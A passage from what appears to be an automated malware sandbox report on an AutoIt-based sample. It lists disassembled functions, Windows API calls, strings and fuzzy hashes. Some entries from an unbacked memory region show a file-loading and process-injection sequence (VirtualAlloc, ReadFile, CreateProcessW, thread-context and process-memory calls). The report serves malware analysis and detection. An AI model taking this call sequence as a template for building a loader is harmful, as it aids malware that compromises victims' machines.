                                                            • Instruction Fuzzy Hash: C9A1FD74E00209EBEB14CFA4C994BEEB7B5BF48704F20855AE505BB280DBB55A81CF54

                                                            Control-flow Graph

                                                            control_flow_graph 1073 8139e7-813a57 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00813A15
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00813A36
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00813A4A
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00813A53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: 0dd6673e8c06ab9daa11b367c2684f1e05cc31ae5e0bd2b73b88021622481e88
                                                            • Instruction ID: 4c5d660cd3e96c0e7785d5e89773d21686b08484912f83fe37d36d4f131a4835
                                                            • Opcode Fuzzy Hash: 0dd6673e8c06ab9daa11b367c2684f1e05cc31ae5e0bd2b73b88021622481e88
                                                            • Instruction Fuzzy Hash: BBF03A706022987EEE3027636C48E673F7DF7C6F60F00022BBA00E2171D2A60820CAB0

                                                            Control-flow Graph

                                                            control_flow_graph 1074 24423b0-24424b1 call 2440000 call 24422a0 CreateFileW 1081 24424b3 1074->1081 1082 24424b8-24424c8 1074->1082 1083 2442568-244256d 1081->1083 1085 24424cf-24424e9 VirtualAlloc 1082->1085 1086 24424ca 1082->1086 1087 24424ed-2442504 ReadFile 1085->1087 1088 24424eb 1085->1088 1086->1083 1089 2442506 1087->1089 1090 2442508-2442542 call 24422e0 call 24412a0 1087->1090 1088->1083 1089->1083 1095 2442544-2442559 call 2442330 1090->1095 1096 244255e-2442566 ExitProcess 1090->1096 1095->1096 1096->1083
                                                            APIs
                                                              • Part of subcall function 024422A0: Sleep.KERNELBASE(000001F4), ref: 024422B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024424A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: 147ZS7DUC5
                                                            • API String ID: 2694422964-1966479656
                                                            • Opcode ID: cb6d10417450f0ddf2bb1d12b739a56ad1a32c3ae96cdff8a9dc1a47aceedb3c
                                                            • Instruction ID: f2dcd6a61ddf421ca486617b4b02d50488bfe7c91733d79dfa3947921e5f9d48
                                                            • Opcode Fuzzy Hash: cb6d10417450f0ddf2bb1d12b739a56ad1a32c3ae96cdff8a9dc1a47aceedb3c
                                                            • Instruction Fuzzy Hash: 2E514E31D04349EBEF10DBA4C815BEEBB79AF58340F004199E609BB2C0DAB95B45CBA5

                                                            Control-flow Graph

                                                            control_flow_graph 1098 81410d-814123 1099 814200-814204 1098->1099 1100 814129-81413e call 817b76 1098->1100 1103 814144-814164 call 817d2c 1100->1103 1104 84d5dd-84d5ec LoadStringW 1100->1104 1107 84d5f7-84d60f call 817c8e call 817143 1103->1107 1108 81416a-81416e 1103->1108 1104->1107 1117 81417e-8141fb call 833020 call 81463e call 832ffc Shell_NotifyIconW call 815a64 1107->1117 1120 84d615-84d633 call 817e0b call 817143 call 817e0b 1107->1120 1110 814205-81420e call 8181a7 1108->1110 1111 814174-814179 call 817c8e 1108->1111 1110->1117 1111->1117 1117->1099 1120->1117
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0084D5EC
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            • _memset.LIBCMT ref: 0081418D
                                                            • _wcscpy.LIBCMT ref: 008141E1
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008141F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: ecbd89cf18fd894d984d8d1c3d2301d252d1d99e05a25979392ac70bf6f531da
                                                            • Instruction ID: 31c4300600c95fc9bfa38632b5120305768ba1f17b6224464a1491b882a7dfa4
                                                            • Opcode Fuzzy Hash: ecbd89cf18fd894d984d8d1c3d2301d252d1d99e05a25979392ac70bf6f531da
                                                            • Instruction Fuzzy Hash: 82319C71009318AAE721EB68DC46BDA77ECFF44314F10461EF195D21A2EB74A698CB93

                                                            Control-flow Graph (legend: Executed / Not Executed; rendered graph not reproduced, only the basic-block node and edge list below):
                                                            control_flow_graph 1133 83564d-835666 1134 835683 1133->1134 1135 835668-83566d 1133->1135 1137 835685-83568b 1134->1137 1135->1134 1136 83566f-835671 1135->1136 1138 835673-835678 call 838d68 1136->1138 1139 83568c-835691 1136->1139 1151 83567e call 838ff6 1138->1151 1141 835693-83569d 1139->1141 1142 83569f-8356a3 1139->1142 1141->1142 1144 8356c3-8356d2 1141->1144 1145 8356b3-8356b5 1142->1145 1146 8356a5-8356b0 call 833020 1142->1146 1149 8356d4-8356d7 1144->1149 1150 8356d9 1144->1150 1145->1138 1148 8356b7-8356c1 1145->1148 1146->1145 1148->1138 1148->1144 1153 8356de-8356e3 1149->1153 1150->1153 1151->1134 1155 8356e9-8356f0 1153->1155 1156 8357cc-8357cf 1153->1156 1157 8356f2-8356fa 1155->1157 1158 835731-835733 1155->1158 1156->1137 1157->1158 1161 8356fc 1157->1161 1159 835735-835737 1158->1159 1160 83579d-83579e call 840df7 1158->1160 1162 83575b-835766 1159->1162 1163 835739-835741 1159->1163 1170 8357a3-8357a7 1160->1170 1165 835702-835704 1161->1165 1166 8357fa 1161->1166 1171 83576a-83576d 1162->1171 1172 835768 1162->1172 1168 835743-83574f 1163->1168 1169 835751-835755 1163->1169 1173 835706-835708 1165->1173 1174 83570b-835710 1165->1174 1167 8357fe-835807 1166->1167 1167->1137 1175 835757-835759 1168->1175 1169->1175 1170->1167 1176 8357a9-8357ae 1170->1176 1177 8357d4-8357d8 1171->1177 1178 83576f-83577b call 834916 call 8410ab 1171->1178 1172->1171 1173->1174 1174->1177 1179 835716-83572f call 840f18 1174->1179 1175->1171 1176->1177 1180 8357b0-8357c1 1176->1180 1181 8357ea-8357f5 call 838d68 1177->1181 1182 8357da-8357e7 call 833020 1177->1182 1194 835780-835785 1178->1194 1190 835792-83579b 1179->1190 1186 8357c4-8357c6 1180->1186 1181->1151 1182->1181 1186->1155 1186->1156 1190->1186 1195 83578b-83578e 1194->1195 1196 83580c-835810 1194->1196 1195->1166 1197 835790 1195->1197 1196->1167 1197->1190
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction ID: fb312783e1f546bdc6d38cec8a2e695d99494fec9e09ca862f50dee0ecff49ac
                                                            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction Fuzzy Hash: 97519130A00B09DBDB249FA9C88566EB7A5FFD0324F648729F825D62D0EB749D508BC1
                                                            APIs
                                                              • Part of subcall function 00814F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00814F6F
                                                            • _free.LIBCMT ref: 0084E68C
                                                            • _free.LIBCMT ref: 0084E6D3
                                                              • Part of subcall function 00816BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00816D0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: 8ade69ab0bf58e2fa92cba553f7b2bebca0989db9739ee9d588ccabc6874b98d
                                                            • Instruction ID: 32d3114dc0242aa942d7f0531f31b01bfcc245ee92ca55e61be0c31634d65dd4
                                                            • Opcode Fuzzy Hash: 8ade69ab0bf58e2fa92cba553f7b2bebca0989db9739ee9d588ccabc6874b98d
                                                            • Instruction Fuzzy Hash: E1913A7191061DAFCF04EFA8C8919EDB7B8FF18314F14446AE815EB291EB34A945CB61
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008135A1,SwapMouseButtons,00000004,?), ref: 008135D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008135A1,SwapMouseButtons,00000004,?,?,?,?,00812754), ref: 008135F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,008135A1,SwapMouseButtons,00000004,?,?,?,?,00812754), ref: 00813617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: a2c4a13a7b2b3d45a05cc7aaf6ffae2e45cca89f90cb121f03d13851256cded4
                                                            • Instruction ID: 6f1e95d4f5e22218979ee062143312b47f8932404ae225bc9e1659506467817e
                                                            • Opcode Fuzzy Hash: a2c4a13a7b2b3d45a05cc7aaf6ffae2e45cca89f90cb121f03d13851256cded4
                                                            • Instruction Fuzzy Hash: 1B114871610208BFDB219FA4DC809EEB7BCFF54740F00446AF909E7210D2719E94A760
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 02441A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02441AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02441B13
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                            • Instruction ID: 900ae317e058769958189d45c5b121bf4dcc72227ec0874f53f23deff7e0c4d4
                                                            • Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                            • Instruction Fuzzy Hash: D2621C74A14258DBEB24CFA4C850BDEB372EF58704F1091AAD10DEB390EB759E81CB59
                                                            APIs
                                                              • Part of subcall function 00815045: _fseek.LIBCMT ref: 0081505D
                                                              • Part of subcall function 008799BE: _wcscmp.LIBCMT ref: 00879AAE
                                                              • Part of subcall function 008799BE: _wcscmp.LIBCMT ref: 00879AC1
                                                            • _free.LIBCMT ref: 0087992C
                                                            • _free.LIBCMT ref: 00879933
                                                            • _free.LIBCMT ref: 0087999E
                                                              • Part of subcall function 00832F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00839C64), ref: 00832FA9
                                                              • Part of subcall function 00832F95: GetLastError.KERNEL32(00000000,?,00839C64), ref: 00832FBB
                                                            • _free.LIBCMT ref: 008799A6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction ID: 755e77c90c59edd3ba7b05f066692a0e44371ce74b75c849878adf10774c2316
                                                            • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction Fuzzy Hash: 4A515FB1904618AFDF249F68DC41A9EBB79FF48310F0044AEF649E7241DB315A80CF59
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction ID: 6e353ec0c2fdb2fe8a1859eb66f8331a6a78e37d3027d0f5d3437d16d281cf5f
                                                            • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction Fuzzy Hash: 4441C47060071A9BDF288EA9C880AAF7BAAFFC0360F24957DE855C7650D774AD418BC4
                                                            APIs
                                                            • _memset.LIBCMT ref: 0084EE62
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0084EEAC
                                                              • Part of subcall function 008148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008148A1,?,?,008137C0,?), ref: 008148CE
                                                              • Part of subcall function 008309D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008309F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: 28db5dc1e684f5d72bd953cfac5ae2e20c06d827afc45471f7f31233b8ef6905
                                                            • Instruction ID: 776cb8296c7e742529e0d7c8a72af704d68bc1f4cb5537b8da4b60104baa3dd2
                                                            • Opcode Fuzzy Hash: 28db5dc1e684f5d72bd953cfac5ae2e20c06d827afc45471f7f31233b8ef6905
                                                            • Instruction Fuzzy Hash: 1F21847191025C9BCB15DF98C845BEE7BFCFF49314F04405AE548E7241DBB899898F92
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: b99d80ef4f886bf4ce4840215677ffcd677080d8447e43390edb9c9ccc0d0094
                                                            • Instruction ID: dfae4d3cae489a2fbbca9c9318db39f9aae066cea1c6effba7f114290e404d60
                                                            • Opcode Fuzzy Hash: b99d80ef4f886bf4ce4840215677ffcd677080d8447e43390edb9c9ccc0d0094
                                                            • Instruction Fuzzy Hash: 0F01F9718146186EDB28C6A8C816FFEBBF8EB01301F00419EF592D2181E575E60487A0
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00879B82
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00879B99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: be05fc86eaaaacf1a50803bcc5548c323606592db4d460c09d5f1df34030782c
                                                            • Instruction ID: 0710df6e81f13c5daaea55477605edb9dd68d1fb2667dd6b342bb228c72e89f8
                                                            • Opcode Fuzzy Hash: be05fc86eaaaacf1a50803bcc5548c323606592db4d460c09d5f1df34030782c
                                                            • Instruction Fuzzy Hash: B6D05E7954030DABDB14ABD0DC0EF9A773CF704704F0042A2BF64D11A2DEB495988B95
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 181f809692498b197cc2401ee16ac756d6cba0cc665fcc129773b682b4de5454
                                                            • Instruction ID: 7099150e2796904f6f42ac5b4c6cf9c75d6e51daec3b9b2fd6883e1c6528b5fe
                                                            • Opcode Fuzzy Hash: 181f809692498b197cc2401ee16ac756d6cba0cc665fcc129773b682b4de5454
                                                            • Instruction Fuzzy Hash: 46F138716087059FC714EF28C484A6ABBE5FF88314F14892EF899DB292D771E945CF82
                                                            APIs
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008303D3
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008303DB
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008303E6
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008303F1
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008303F9
                                                              • Part of subcall function 008303A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00830401
                                                              • Part of subcall function 00826259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0081FA90), ref: 008262B4
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0081FB2D
                                                            • OleInitialize.OLE32(00000000), ref: 0081FBAA
                                                            • CloseHandle.KERNEL32(00000000), ref: 008549F2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID:
                                                            • API String ID: 1986988660-0
                                                            • Opcode ID: 9d454f66717a8e6b381d65a71e7a4155cff501d468d6b859c5fbbe7ba02f3240
                                                            • Instruction ID: 5c8fed9bc808c5f0d958d0298438e30a2f7200fdb936c6972a2684db71e2ffc4
                                                            • Opcode Fuzzy Hash: 9d454f66717a8e6b381d65a71e7a4155cff501d468d6b859c5fbbe7ba02f3240
                                                            • Instruction Fuzzy Hash: F281A9B090224C8FC788EFA9E9556557BF6FB88318B10872BD118C7362FB354468CF59
                                                            APIs
                                                            • _memset.LIBCMT ref: 00814401
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008144A6
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008144C3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: 57284abf9ff3ad9cbe82b1771651b69e63124e66d1236ca94e2a3de629b55239
                                                            • Instruction ID: a33cda4ca4cb9a1ddf0e6fc10a7bc9dd49765f45e0e7318b15007fb05e8c5959
                                                            • Opcode Fuzzy Hash: 57284abf9ff3ad9cbe82b1771651b69e63124e66d1236ca94e2a3de629b55239
                                                            • Instruction Fuzzy Hash: EA316FB05067059FD720DF24D8847DBBBE8FF48308F000A2EE59AC3251E775A988CB96
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 00835963
                                                              • Part of subcall function 0083A3AB: __NMSG_WRITE.LIBCMT ref: 0083A3D2
                                                              • Part of subcall function 0083A3AB: __NMSG_WRITE.LIBCMT ref: 0083A3DC
                                                            • __NMSG_WRITE.LIBCMT ref: 0083596A
                                                              • Part of subcall function 0083A408: GetModuleFileNameW.KERNEL32(00000000,008D43BA,00000104,?,00000001,00000000), ref: 0083A49A
                                                              • Part of subcall function 0083A408: ___crtMessageBoxW.LIBCMT ref: 0083A548
                                                              • Part of subcall function 008332DF: ___crtCorExitProcess.LIBCMT ref: 008332E5
                                                              • Part of subcall function 008332DF: ExitProcess.KERNEL32 ref: 008332EE
                                                              • Part of subcall function 00838D68: __getptd_noexit.LIBCMT ref: 00838D68
                                                            • RtlAllocateHeap.NTDLL(017B0000,00000000,00000001,00000000,?,?,?,00831013,?), ref: 0083598F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
